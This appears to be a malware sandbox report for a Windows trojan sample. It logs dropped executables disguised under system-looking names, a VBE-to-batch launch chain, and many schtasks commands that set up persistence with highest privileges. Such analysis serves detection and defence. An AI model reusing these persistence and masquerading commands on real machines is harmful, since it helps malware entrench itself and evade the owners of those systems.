                                    Source: C:\Windows\SysWOW64\wscript.exe | COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
                                    Source: C:\Users\user\Desktop\7aHY4r6vXR.exe | Code function: 0_2_00BD6FAA: __EH_prolog,_wcslen,_wcslen,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,0_2_00BD6FAA
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exe | File created: C:\Windows\assembly\GAC_32\System.Data.OracleClient\2.0.0.0__b77a5c561934e089\SfLAFHFXIbHzHGgilQgXtKOw.exe
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exe | File created: C:\Windows\assembly\GAC_32\System.Data.OracleClient\2.0.0.0__b77a5c561934e089\b1829d2998bf98
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exe | File created: C:\Windows\SchCache\RuntimeBroker.exe
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exe | File created: C:\Windows\SchCache\9e8d7a4ca61bd9
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exe | File created: C:\Windows\Migration\WTR\SfLAFHFXIbHzHGgilQgXtKOw.exe
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exe | File created: C:\Windows\Migration\WTR\b1829d2998bf98
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | File created: c:\Windows\System32\CSCAAFDA77B4B0340CF902F598B7E2DA6.TMP
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | File created: c:\Windows\System32\SecurityHealthSystray.exe
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | File deleted: C:\Windows\System32\CSCAAFDA77B4B0340CF902F598B7E2DA6.TMP
                                    Source: Joe Sandbox View Dropped File: C:\Users\user\Desktop\ARUSTYfT.log 7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                    Source: C:\Users\user\Desktop\7aHY4r6vXR.exe Code function: String function: 00BEEC50 appears 56 times
                                    Source: C:\Users\user\Desktop\7aHY4r6vXR.exe Code function: String function: 00BEF5F0 appears 31 times
                                    Source: C:\Users\user\Desktop\7aHY4r6vXR.exe Code function: String function: 00BEEB78 appears 39 times
                                    Source: VObntHLa.log.4.dr Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                                    Source: ARUSTYfT.log.4.dr Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                                    Source: riACjval.log.4.dr Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                                    Source: hzhmzTUD.log.4.dr Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                                    Source: 7aHY4r6vXR.exe, 00000000.00000003.1740412950.000000000365A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamewscript.exe.mui` vs 7aHY4r6vXR.exe
                                    Source: 7aHY4r6vXR.exe, 00000000.00000003.1740412950.000000000365A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamewscript.exe` vs 7aHY4r6vXR.exe
                                    Source: 7aHY4r6vXR.exe Binary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs 7aHY4r6vXR.exe
                                    Source: 7aHY4r6vXR.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                                    Source: bridgeServerFontSavesMonitor.exe.0.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    Source: SfLAFHFXIbHzHGgilQgXtKOw.exe.4.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    Source: SfLAFHFXIbHzHGgilQgXtKOw.exe0.4.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    Source: RuntimeBroker.exe.4.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    Source: SfLAFHFXIbHzHGgilQgXtKOw.exe1.4.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    Source: SfLAFHFXIbHzHGgilQgXtKOw.exe2.4.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    Source: classification engine Classification label: mal100.spre.troj.expl.evad.winEXE@45/29@0/0
                                    Source: C:\Users\user\Desktop\7aHY4r6vXR.exe Code function: 0_2_00BD6C74 GetLastError,FormatMessageW,0_2_00BD6C74
                                    Source: C:\Users\user\Desktop\7aHY4r6vXR.exe Code function: 0_2_00BEA6C2 FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,CreateStreamOnHGlobal,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,0_2_00BEA6C2
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exe File created: C:\Users\user\Desktop\VObntHLa.log
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\DCR_MUTEX-ir7LGSrsk71YAT4WpA4X
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exe Mutant created: NULL
                                    Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4144:120:WilError_03
                                    Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4856:120:WilError_03
                                    Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3620:120:WilError_03
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exe File created: C:\Users\Default User\Local Settings\Temp\SfLAFHFXIbHzHGgilQgXtKOw.exe
                                    Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\ChainBroker\IrbV6YakyWCvQIuALcoa2IhBwWZ19ItpwUlqov7vyFBfFx5s16nM.bat" "
                                    Source: C:\Users\user\Desktop\7aHY4r6vXR.exe Command line argument: sfxname 0_2_00BEDF1E
                                    Source: C:\Users\user\Desktop\7aHY4r6vXR.exe Command line argument: sfxstime 0_2_00BEDF1E
                                    Source: C:\Users\user\Desktop\7aHY4r6vXR.exe Command line argument: STARTDLG 0_2_00BEDF1E
                                    Source: 7aHY4r6vXR.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    Source: 7aHY4r6vXR.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Users\user\Desktop\7aHY4r6vXR.exe File read: C:\Windows\win.ini
                                    Source: C:\Users\user\Desktop\7aHY4r6vXR.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                                    Source: 7aHY4r6vXR.exe Virustotal: Detection: 48%
                                    Source: 7aHY4r6vXR.exe ReversingLabs: Detection: 65%
                                    Source: C:\Users\user\Desktop\7aHY4r6vXR.exe File read: C:\Users\user\Desktop\7aHY4r6vXR.exe
                                    Source: unknown Process created: C:\Users\user\Desktop\7aHY4r6vXR.exe "C:\Users\user\Desktop\7aHY4r6vXR.exe"
                                    Source: C:\Users\user\Desktop\7aHY4r6vXR.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\ChainBroker\WiJ0Q2cIafyWfcOMJ8mrmlFuDvVbi9nZIDl7gyLiG4eFyDELulT2kNl2MWww.vbe"
                                    Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\ChainBroker\IrbV6YakyWCvQIuALcoa2IhBwWZ19ItpwUlqov7vyFBfFx5s16nM.bat" "
                                    Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\ChainBroker\bridgeServerFontSavesMonitor.exe "C:\ChainBroker/bridgeServerFontSavesMonitor.exe"
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "SfLAFHFXIbHzHGgilQgXtKOwS" /sc MINUTE /mo 13 /tr "'C:\Users\Default User\Local Settings\Temp\SfLAFHFXIbHzHGgilQgXtKOw.exe'" /f
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "SfLAFHFXIbHzHGgilQgXtKOw" /sc ONLOGON /tr "'C:\Users\Default User\Local Settings\Temp\SfLAFHFXIbHzHGgilQgXtKOw.exe'" /rl HIGHEST /f
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "SfLAFHFXIbHzHGgilQgXtKOwS" /sc MINUTE /mo 6 /tr "'C:\Users\Default User\Local Settings\Temp\SfLAFHFXIbHzHGgilQgXtKOw.exe'" /rl HIGHEST /f
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\axeflxig\axeflxig.cmdline"
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES69DB.tmp" "c:\Windows\System32\CSCAAFDA77B4B0340CF902F598B7E2DA6.TMP"
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "SfLAFHFXIbHzHGgilQgXtKOwS" /sc MINUTE /mo 6 /tr "'C:\Windows\Migration\WTR\SfLAFHFXIbHzHGgilQgXtKOw.exe'" /f
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "SfLAFHFXIbHzHGgilQgXtKOw" /sc ONLOGON /tr "'C:\Windows\Migration\WTR\SfLAFHFXIbHzHGgilQgXtKOw.exe'" /rl HIGHEST /f
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "SfLAFHFXIbHzHGgilQgXtKOwS" /sc MINUTE /mo 14 /tr "'C:\Windows\Migration\WTR\SfLAFHFXIbHzHGgilQgXtKOw.exe'" /rl HIGHEST /f
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Windows\SchCache\RuntimeBroker.exe'" /rl HIGHEST /f
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 7 /tr "'C:\Windows\SchCache\RuntimeBroker.exe'" /rl HIGHEST /f
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "SfLAFHFXIbHzHGgilQgXtKOwS" /sc MINUTE /mo 13 /tr "'C:\Windows\assembly\GAC_32\System.Data.OracleClient\2.0.0.0__b77a5c561934e089\SfLAFHFXIbHzHGgilQgXtKOw.exe'" /f
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "SfLAFHFXIbHzHGgilQgXtKOw" /sc ONLOGON /tr "'C:\Windows\assembly\GAC_32\System.Data.OracleClient\2.0.0.0__b77a5c561934e089\SfLAFHFXIbHzHGgilQgXtKOw.exe'" /rl HIGHEST /f
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "SfLAFHFXIbHzHGgilQgXtKOwS" /sc MINUTE /mo 13 /tr "'C:\Windows\assembly\GAC_32\System.Data.OracleClient\2.0.0.0__b77a5c561934e089\SfLAFHFXIbHzHGgilQgXtKOw.exe'" /rl HIGHEST /f
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "SfLAFHFXIbHzHGgilQgXtKOwS" /sc MINUTE /mo 7 /tr "'C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exe'" /f
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "SfLAFHFXIbHzHGgilQgXtKOw" /sc ONLOGON /tr "'C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exe'" /rl HIGHEST /f
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "bridgeServerFontSavesMonitorb" /sc MINUTE /mo 9 /tr "'C:\ChainBroker\bridgeServerFontSavesMonitor.exe'" /f
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "bridgeServerFontSavesMonitorb" /sc MINUTE /mo 7 /tr "'C:\ChainBroker\bridgeServerFontSavesMonitor.exe'" /rl HIGHEST /f
                                    Source: unknown Process created: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exe C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exe
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\FeErzF7oGb.bat"
                                    Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: unknown Process created: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exe C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exe
                                    Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001
                                    Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                    Source: unknown Process created: C:\ChainBroker\bridgeServerFontSavesMonitor.exe C:\ChainBroker\bridgeServerFontSavesMonitor.exe
                                    Source: unknown Process created: C:\ChainBroker\bridgeServerFontSavesMonitor.exe C:\ChainBroker\bridgeServerFontSavesMonitor.exe
                                    Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Default\AppData\Local\Temp\SfLAFHFXIbHzHGgilQgXtKOw.exe "C:\Users\Default User\Local Settings\Temp\SfLAFHFXIbHzHGgilQgXtKOw.exe"
                                    Source: unknown Process created: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exe "C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exe"
                                    Source: unknown Process created: C:\ChainBroker\bridgeServerFontSavesMonitor.exe "C:\ChainBroker\bridgeServerFontSavesMonitor.exe"
                                    Source: unknown Process created: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exe "C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exe"
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: gpapi.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.storage.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: apphelp.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dlnashext.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wpdshext.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: edputil.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: urlmon.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: iertutil.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: srvcli.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: netutils.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wintypes.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: appresolver.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: slc.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sppc.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeSection loaded: mscoree.dllJump to behavior
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeSection loaded: apphelp.dllJump to behavior
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeSection loaded: version.dllJump to behavior
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeSection loaded: uxtheme.dllJump to behavior
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeSection loaded: windows.storage.dllJump to behavior
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeSection loaded: wldp.dllJump to behavior
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeSection loaded: profapi.dllJump to behavior
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeSection loaded: cryptsp.dllJump to behavior
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeSection loaded: rsaenh.dllJump to behavior
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeSection loaded: cryptbase.dllJump to behavior
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeSection loaded: ktmw32.dllJump to behavior
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeSection loaded: ntmarta.dllJump to behavior
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeSection loaded: wbemcomn.dllJump to behavior
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeSection loaded: amsi.dllJump to behavior
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeSection loaded: userenv.dllJump to behavior
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeSection loaded: propsys.dllJump to behavior
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeSection loaded: dlnashext.dllJump to behavior
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeSection loaded: wpdshext.dllJump to behavior
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeSection loaded: edputil.dllJump to behavior
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeSection loaded: urlmon.dllJump to behavior
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeSection loaded: iertutil.dllJump to behavior
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeSection loaded: srvcli.dllJump to behavior
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeSection loaded: netutils.dllJump to behavior
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeSection loaded: wintypes.dllJump to behavior
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeSection loaded: appresolver.dllJump to behavior
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeSection loaded: bcp47langs.dllJump to behavior
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeSection loaded: slc.dllJump to behavior
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeSection loaded: sppc.dllJump to behavior
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: vcruntime140_clr0400.dll
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: version.dll
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: kernel.appcore.dll
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: mscoree.dll
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: cryptsp.dll
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: rsaenh.dll
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: cryptbase.dll
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Section loaded: vcruntime140_clr0400.dll
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Section loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Section loaded: cryptsp.dll
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Section loaded: rsaenh.dll
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Section loaded: cryptbase.dll
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Section loaded: kernel.appcore.dll
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exe Section loaded: mscoree.dll
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exe Section loaded: apphelp.dll
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exe Section loaded: kernel.appcore.dll
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exe Section loaded: version.dll
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exe Section loaded: vcruntime140_clr0400.dll
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exe Section loaded: ucrtbase_clr0400.dll
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exe Section loaded: uxtheme.dll
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exe Section loaded: windows.storage.dll
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exe Section loaded: wldp.dll
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exe Section loaded: profapi.dll
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exe Section loaded: cryptsp.dll
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exe Section loaded: rsaenh.dll
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exe Section loaded: cryptbase.dll
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exe Section loaded: sspicli.dll
                                    Source: C:\Windows\System32\cmd.exe Section loaded: cmdext.dll
                                    Source: C:\Windows\System32\cmd.exe Section loaded: apphelp.dll
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exe Section loaded: mscoree.dll
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exe Section loaded: kernel.appcore.dll
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exe Section loaded: version.dll
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exe Section loaded: vcruntime140_clr0400.dll
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exe Section loaded: ucrtbase_clr0400.dll
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exe Section loaded: uxtheme.dll
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exe Section loaded: windows.storage.dll
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exe Section loaded: wldp.dll
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exe Section loaded: profapi.dll
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exe Section loaded: cryptsp.dll
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exe Section loaded: rsaenh.dll
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exe Section loaded: cryptbase.dll
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exe Section loaded: sspicli.dll
                                    Source: C:\Windows\System32\chcp.com Section loaded: ulib.dll
                                    Source: C:\Windows\System32\chcp.com Section loaded: fsutilext.dll
                                    Source: C:\Windows\System32\w32tm.exe Section loaded: iphlpapi.dll
                                    Source: C:\Windows\System32\w32tm.exe Section loaded: logoncli.dll
                                    Source: C:\Windows\System32\w32tm.exe Section loaded: netutils.dll
                                    Source: C:\Windows\System32\w32tm.exe Section loaded: ntmarta.dll
                                    Source: C:\Windows\System32\w32tm.exe Section loaded: ntdsapi.dll
                                    Source: C:\Windows\System32\w32tm.exe Section loaded: mswsock.dll
                                    Source: C:\Windows\System32\w32tm.exe Section loaded: dnsapi.dll
                                    Source: C:\Windows\System32\w32tm.exe Section loaded: rasadhlp.dll
                                    Source: C:\Windows\System32\w32tm.exe Section loaded: fwpuclnt.dll
                                    Source: C:\Windows\System32\w32tm.exe Section loaded: kernel.appcore.dll
